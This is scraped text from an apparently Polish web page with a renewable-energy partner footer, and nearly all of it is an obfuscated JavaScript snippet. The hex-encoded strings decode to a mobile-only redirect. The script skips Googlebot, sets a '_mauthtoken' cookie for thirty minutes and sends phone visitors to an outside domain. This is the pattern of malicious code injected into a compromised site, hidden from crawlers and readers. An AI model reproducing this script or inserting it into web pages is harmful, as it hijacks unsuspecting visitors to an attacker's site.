_0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}
do góry

Energia odnawialna - nasz partner SWE